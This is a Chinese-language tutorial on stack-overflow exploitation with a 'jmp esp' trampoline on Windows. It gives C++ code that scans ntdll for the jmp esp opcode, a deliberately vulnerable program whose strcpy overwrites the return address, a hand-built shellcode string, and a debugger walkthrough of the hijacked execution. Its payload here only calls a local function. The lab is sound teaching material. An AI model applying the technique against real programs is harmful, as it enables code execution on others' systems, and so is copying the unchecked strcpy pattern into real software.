通过jmp esp利用栈溢出,首先我们要找出jmp esp 的地址,因为系统不同,通用jmp esp的地址可能不同,下面的代码是找出jmp esp的地址的:
#include<windows.h>
#include<iostream.h>
#include<tchar.h>
int main()
{
int nRetCode=0;
bool we_load_it=false;
HINSTANCE h;
TCHAR dllname[]=_T("ntdll");
h=GetModuleHandle(dllname);
if(h==NULL)
{h=LoadLibrary(dllname);
if(h==NULL)
{cout<<"ERROR LOADING DLL:"<<dllname<<endl;
return 1;
}
we_load_it=true;
}
BYTE* ptr=(BYTE*)h;
bool done=false;
for(int y=0;!done;y++)
{try
{
if(ptr[y]==0xFF&&ptr[y+1]==0xE4)
{int pos=(int)ptr+y;
cout<<"OPCODE found at 0x"<<hex<<pos<<endl;}}
catch(...)
{
cout<<"END OF"<<dllname<<"MEMORY REACHED"<<endl;
done=true;
}
}
if(we_load_it)
FreeLibrary(h);
return nRetCode;
}
我用的是0x772e55f7
给出程序:
#include "stdio.h"
#include "windows.h"
#include "string.h"
char *shellcode="\x64\x65\x66\x67\x68\x69\x70\x71\xf7\x55\x2e\x77\x90\x90\x90\x90\x6a\x05\x6a\x04\x6a\x03\xe8\x7a\xfe\x40\xff\x83\xc4\x0c";
void fun1(int a, int b)
{
printf("fun1 run!para a=%d,b=%d\n",a,b);
char aa[4]={0};
strcpy(aa,shellcode);
}
void fun2(int a)
{
printf("fun2 run! para a=%d\n",a);
}
void fun3(int a,int b,int c)
{
printf("fun3 run! para a=%d,b=%d,c=%d\n",a,b,c);
}
int main(int argc, char* argv[])
{
printf("begin\n");
fun1(1,2);
__asm{
mov eax,4198410
call eax
}
printf("end\n");
return 0;
}
反汇编调试:
执行完strcpy,发现数据溢出了,有的数据被覆盖了
执行到ret,esp地址存放的内容是0x772e55f7,jmp esp的通用地址
执行jmp esp ,执行完eip的值和esp一样,为0x0019fedc
我们就会跳到0x0019fedc继续执行
从上图可以看出程序执行的代码就是从0x0019fedc开始,把数据当作机器码,机器码所对应的汇编就是程序要执行代码。而这些数据就是shellcode的内容,所以利用jmp esp跳转,让机子干什么就把对应的机器码放在shellcode里,但注意,不能有如果有00数据,一定要放在最后
